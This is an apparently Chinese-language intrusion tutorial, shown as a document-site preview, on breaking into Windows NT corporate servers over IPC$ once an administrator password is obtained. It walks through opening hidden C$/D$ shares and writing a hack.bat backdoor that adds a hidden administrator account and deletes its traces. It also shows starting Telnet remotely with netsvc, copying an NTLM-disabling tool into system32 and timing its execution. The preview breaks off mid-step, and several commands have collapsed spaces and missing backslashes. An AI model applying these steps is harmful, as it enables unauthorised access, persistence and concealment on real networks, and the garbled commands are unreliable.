IPC$连入侵的高级手段.doc

IPC$连入侵的高级手段.doc

ID:55339391

大小:34.50 KB

页数:5页

时间:2020-05-11

IPC$连入侵的高级手段.doc_第1页
IPC$连入侵的高级手段.doc_第2页
IPC$连入侵的高级手段.doc_第3页
IPC$连入侵的高级手段.doc_第4页
IPC$连入侵的高级手段.doc_第5页
资源描述:

《IPC$连入侵的高级手段.doc》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、NT完全入侵教程(新手篇)   现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机……  得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。但到底能做什么呢?能详细答出来的只怕不会很多,而且很多企业系统管理员就认为密码为空没什么,因为他们压根就不知道“黑客”会怎么做。本文介绍的就是得到NT的管理员密码以后入侵一个企业计算机群的初级和中级手法,尤其是在一个大型企业当中,企业系统管理员的密码往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展和生存。  首

2、先,我们先假定得到了某个企业的一台服务器192.168.0.1的Administrator的密码,而对方没有关闭139端口。  1.普通共享资源的入侵  这种入侵手法可说是NT最简单的入侵了。随便在自己机器的哪个窗口的地址栏里输入“\192.168.0.1”大概等1-2秒,对方就会要求你输入用户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共享资源了。由于权限是Admin所以你几乎可以删除对方共享资源里的任何东西。(如果设置了共享为只读那就没办法了)  2.默认及隐藏共享资源的入侵  在说这种入侵方法之前我先来给大家介绍一个NT的IP

3、C$连接,在默认情况下NT系统有一个特殊的隐藏共享,就是IPC$共享。IPC$是专门用在NT中的一种管道通讯,NT系统之间的通讯大部分都在IPC$通讯中完成的。  这次手法相对高明一点,但还是很简单的。不过关键还是要看“黑客”如何利用了,有的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用后门进入。同样在机器里随便打开一个窗口,在地址栏输入“\192.168.0.1”就会要求输入密码,输入以后所看到的东西和前面介绍的一样。好了,现在同时也建立好IPC$连接了,其实在提示你输入密码时从输入窗口中也知道了是建立IPC$连接。然后我们再次在

4、地址栏输入地址,这次输入的就有点不同了,输入“\192.168.0.1c$”大概过一会就出现了对方C盘里所有的内容了。想看对方D盘吗?同样,输入“\192.168.0.1D$”就看见对方D盘了。然后想换这个企业的主页(假如对方还是一个Web服务器)可以说是轻而易举。记住由于权限是管理员当然可以写了,留不留后门就看“黑客”的想法咯。一般他们会在C盘(假设在C:\WINNT下)建立一个批处理文件,假设文件名为hack.bat,其内容一般为:  netuserhack1234/add(建立一个用户名为hack的用户,密码为1234)  netlocalgroupad

5、ministratorshack/add(让hack也是管理员)  delC:DocumentsandSettingsAdministrator开始菜单程序启动hack.lnk(删除启动文件夹里的快捷方式消除足迹)  delc:winnthack.bat(删除hack.bat这个文件消除足迹)  这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。当然其实添加用户算是一个比较愚蠢的留“后门”的方法了,所以其实很多“黑客”会放一个可以常驻内存的小程序,然后建立一个类似的批处理文件和快捷方式,那么“黑客”基本上可以长期的占有企业中的这台主机了。  3

6、.IPC$连接入侵的高级手段  然而每个“黑客”都不可能那么笨,非要一直等到下次企业系统管理员登陆以后才可以占有,往往“黑客”会使用更加巧妙的手法,迅速的留下后门。首先他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开Telnet服务,“黑客”怎么打开Telnet服务呢?其实有很多种方法,比如微软公司自己就出了一个小程序“netsvc.exe”就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具,但这个工具到了“黑客”手中自然也成了必不可少的“黑客”工具了。在命令符下输入“netsvc\192.168.0.1telnet/start”

7、大概等5分钟对方的Telnet服务就打开了,然后“telnet192.168.0.1”嘿嘿……等!需要NTLM验证,这下又把“黑客”拦在了外面了,这时他们又会用到一个小程序了,就是专门关闭一个NTLM验证的程序ntlm.exe。(当然也可以是其他名字)“copyntlm.exe\192.168.0.1admin$system32”把ntlm.exe复制到对方企业服务器的system32目录下。复制过去了,可怎么让他运行呢?当然多的是办法了。“nettime\192.168.0.1”看看对方系统时间为多少假设为18:00。现在再输入

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。